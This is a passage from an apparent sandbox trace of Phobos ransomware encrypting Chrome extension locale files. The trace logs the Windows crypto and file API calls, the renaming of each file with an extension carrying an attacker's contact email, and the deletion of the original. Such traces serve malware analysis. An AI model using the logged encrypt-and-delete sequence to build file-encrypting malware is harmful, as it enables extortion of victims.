hTemplateFile=0x0) returned 0x148 [0148.336] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.337] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.337] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.337] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.337] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.337] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe6, lpOverlapped=0x0) returned 1 [0148.338] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0148.338] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0148.339] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.339] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.339] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.339] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.339] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.339] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.339] CloseHandle (hObject=0x148) returned 1 [0148.339] CloseHandle (hObject=0x188) returned 1 [0148.339] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json")) returned 1 [0148.340] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.340] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=228) returned 1 [0148.340] CloseHandle (hObject=0x188) returned 1 [0148.340] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json")) returned 0x2020 [0148.340] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.341] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.341] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.341] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.341] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.341] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe4, lpOverlapped=0x0) returned 1 [0148.342] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0148.342] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0148.343] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.343] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.343] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.343] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.343] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.343] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.343] CloseHandle (hObject=0x188) returned 1 [0148.343] CloseHandle (hObject=0x148) returned 1 [0148.343] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json")) returned 1 [0148.344] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.345] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=233) returned 1 [0148.345] CloseHandle (hObject=0x148) returned 1 [0148.345] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json")) returned 0x2020 [0148.345] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.345] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.345] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.345] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.345] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.345] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe9, lpOverlapped=0x0) returned 1 [0148.346] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0148.346] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0148.347] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.347] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.347] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.347] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.347] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.347] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.347] CloseHandle (hObject=0x148) returned 1 [0148.348] CloseHandle (hObject=0x188) returned 1 [0148.348] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json")) returned 1 [0148.349] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.349] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=210) returned 1 [0148.349] CloseHandle (hObject=0x188) returned 1 [0148.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json")) returned 0x2020 [0148.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.350] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.350] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.350] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.350] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.350] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd2, lpOverlapped=0x0) returned 1 [0148.351] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.351] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.352] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.352] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.352] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.352] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.352] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.352] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.352] CloseHandle (hObject=0x188) returned 1 [0148.352] CloseHandle (hObject=0x148) returned 1 [0148.352] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json")) returned 1 [0148.353] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.355] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=221) returned 1 [0148.355] CloseHandle (hObject=0x148) returned 1 [0148.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json")) returned 0x2020 [0148.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.356] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.356] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.356] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.356] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.356] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xdd, lpOverlapped=0x0) returned 1 [0148.357] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.357] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.358] CryptImportKey (in: 